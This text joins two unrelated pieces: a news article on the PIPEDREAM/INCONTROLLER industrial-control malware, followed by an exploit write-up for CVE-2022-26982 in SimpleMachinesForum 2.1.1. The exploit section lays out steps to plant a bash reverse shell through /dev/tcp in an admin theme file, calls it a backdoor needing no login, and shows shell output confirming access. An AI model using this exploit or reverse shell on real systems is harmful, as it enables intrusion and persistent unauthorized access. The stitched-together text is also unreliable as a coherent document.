Mandiant said it is also tracking two other tools targeted at Windows-based systems that appear to be related to INCONTROLLER activity. One of them exploits a known vulnerability, CVE-2020-15368, to install and exploit a vulnerable driver on target systems, and the other is a backdoor that enables reconnaissance activity. The tools could be used to support a threat actor's broader goals in an industrial cyberattack, Mandiant said.

**A Clear and Present Danger to Industrial Environments**  
ICS security vendor Dragos listed a total of 16 devices and software tools from Omron and Schneider that it said the malware was designed to interact with and exploit. The technologies are used in a wide range of industry verticals. But Dragos said its analysis of the malware suggests it is targeted mostly at equipment in liquefied natural gas (LNG) and electric power environments.

Dragos is collectively tracking the attack tools as "PIPEDREAM" and the threat actors behind it as "CHERNOVITE." A whitepaper that the company released this week on the threat identified the threat actor as having the ability — among other things — to manipulate the torque and speed of Omron servo motors in a way that could cause enough physical destruction to result in loss of life. Dragos' whitepaper listed several other malicious actions that threat actors could use the malware for, including triggering denial of control and denial for view for ICS operators; disrupting operating technology by masquerading as a trusted process; disabling process controllers to extend time-to-recovery from an incident; and undermining authentication and encryption mechanisms in OT environments.

"PIPEDREAM is a clear and present threat to the availability, control, and safety of industrial control systems and processes endangering operations and lives," Dragos said.

News of the malware tools comes just days after reports of Ukraine's computer emergency response team (CERT-UA) thwarting an effort by Russia's Sandworm group to disrupt the country's power grid using Industroyer, one of the first known malware tools targeted specifically at the electric grid. So far, researchers have discovered at least seven highly sophisticated ICS-specific attack tools, which include Stuxnet, Industroyer, Triton, and BlackEnergy.

Danielle Jablanski, OT cybersecurity strategist at Nozomi Networks, says the combined tools in this case were built to search for specific devices, to understand their operational parameters, to gain credentialed access, and to remotely control various legitimate functions of the devices for their intended objectives. "These are customizable based on the devices targeted but can be modified to target additional devices that leverage the same protocols," she says.

Jablanski says that options for thwarting attacks become scarce when threat actors have the credentials and know how to use devices based on their design, protocols, and features.

It's presently unclear in what host environment the newly discovered tools were found. But typically, some stop-gap measures for mitigating exposure to the threat would include disabling unnecessary functionality, introducing access controls to limit legitimate users who communicate with the device, and taking password management seriously. "Device hardening to limit the susceptibility and severity of cyber incidents is a staple of defense in depth strategies across ICS/OT environments," she says.

Eric Byres, CEO of aDolus Technology, says the new tools highlight a recent trend away from previous attacks where threat actors gained access to an OT environment by leapfrogging to it from the IT network. Those kinds of attacks have become less common with many organizations tightening OT security. So, sophisticated attackers are finding other ways to establish access to their victims' OT networks, he says pointing to Stuxnet as an example.

"Stuxnet did it through a combination of infected USB flash drives, printer sharing, and modified PLC logic files," he says. Similarly, Dragonfly, which was Russian in origin, attacked the manufacturers of OT control equipment and replaced the software they supplied to their industrial customers with trojanized versions.

"These supply chain-driven attacks are now becoming the preferred method for nation-state attackers, especially the Russian spy agencies," Byres says. "By going after OT suppliers rather than the OT systems directly, they get tremendous multiplication effects."

New Malware Tools Pose 'Clear and Present Threat' to ICS Environments

SimpleMachinesForum 2.1.1 and earlier allows remote authenticated administrators to execute arbitrary code by inserting a vulnerable php code because the themes can be modified by an administrator.

Permalink

Cannot retrieve contributors at this time

\# Exploit Title: Authenticated Remote Code Execution in SimpleMachinesForum 2.1.1

\# Remote Code Execution in SimpleMachinesForum 2.1.1 and earlier allows remote attackers to execute arbitrary code via uploading a php web shell. SimpleMachinesForum 2.1.1 and earlier allows remote authenticated administrators to execute arbitrary code by inserting a vulnerable php code because the themes can be modified by an administrator.

\# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718

\# Date: 7th March 2022

\# CVE ID: CVE-2022-26982

\# Confirmed on release 2.1.1

\# Vendor: https://download.simplemachines.org/

\# Note- Once we insert the vulnerable php code, we can even execute it without any valid login as it is not required! We can use it as a backdoor!

###############################################

#Step1- Login with Admin Credentials

#Step2- Goto Admin=>Main=>Administration Center=>Configuration=>Themes and Layout=>Modify Themes=>Browse the templates and files in this theme.=>Admin.template.php

#Step3- Now add the vulnerable php reverse tcp web shell exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4477 0>&1'"); ?>

#Step4- Now Goto Add Media=>Add Resource=> Upload php web shell and click on SAVE CHANGES at the bottom of the page

#Step5- Now click on "Themes and Layout" and you will get the reverse shell:

E.g: Visit http://IP\_ADDR/index.php?action=admin;area=theme;b4c2510f=bc6cde24d794569356b81afc98ede2c2 and get the reverse shell:

listening on \[any\] 4477 ...

connect to \[192.168.56.1\] from (UNKNOWN) \[192.168.56.130\] 41276

bash: cannot set terminal process group (1334): Inappropriate ioctl for device

bash: no job control in this shell

daemon@debian:/opt/bitnami/simplemachinesforum$ whoami

whoami

daemon

daemon@debian:/opt/bitnami/simplemachinesforum$ id

id

uid=1(daemon) gid=1(daemon) groups=1(daemon)

daemon@debian:/opt/bitnami/simplemachinesforum$

Tag

#backdoor